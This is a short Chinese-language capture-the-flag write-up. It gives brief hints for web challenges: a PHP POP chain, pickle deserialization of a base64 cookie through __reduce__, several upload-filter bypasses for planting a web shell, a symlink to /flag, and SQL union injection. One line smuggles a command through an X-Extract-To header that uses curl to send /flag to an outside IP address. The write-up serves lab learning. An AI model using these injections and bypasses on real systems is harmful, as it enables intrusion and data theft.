POPgadget
很简单的pop链,不分析了。主要是system的第二个参数可以是一个空数组。
pickelshop
有/api/register、/api/login和/pickelshop三个路由
在/api/register进行注册得到cookieuser=gASVKwAAAAAAAAB9lCiMCHVzZXJuYW1llIwFYWRtaW6UjAhwYXNzd29yZJSMBWFkbWlulHUu
,其实就{"username":"admin","password":"admin"}
进行pickle.dump后进行base64编码后的值。然后在/api/login输入username和password进行登录,但是没有cookie就会失败。有username和password和对应的cookie值,不用注册也可以成功登录。所以f服务端一定是对我们的cookie进行了pickle.load操作的,然后和我们输入的信息进行比对。没有ban什么,直接用__reduce__执行命令。一定要在本地load自己的payload确保可行,自己本地都执行不了就别对着靶机狂冲了
zupload
直接?action=/flag就可以了
zupload-pro
是前端的验证,禁用js或先把木马改zip抓包改回php
zupload-pro-plus
backdoor.zip.php绕过
zupload-pro-plus-max
先写个木马,然后压缩为zip,上传然后include包含即可执行命令
zupload-pro-plus-max-ultra
在post的请求头增加X-Extract-To: /var/www/html;curl -d @/flag 124.221.19.214:2333;
即可
zupload-pro-revenge
和zupoad-pro一样
zupload-pro-plus-enhanced
1.zip.php绕过
zupload-pro-plus-max-ultra-premium
创建一个指向/flag的软链接
上传访问/uploads/flag即可
sql教学局
union查询,不多讲
readbooks
public路由是读文件,list路由是列出文件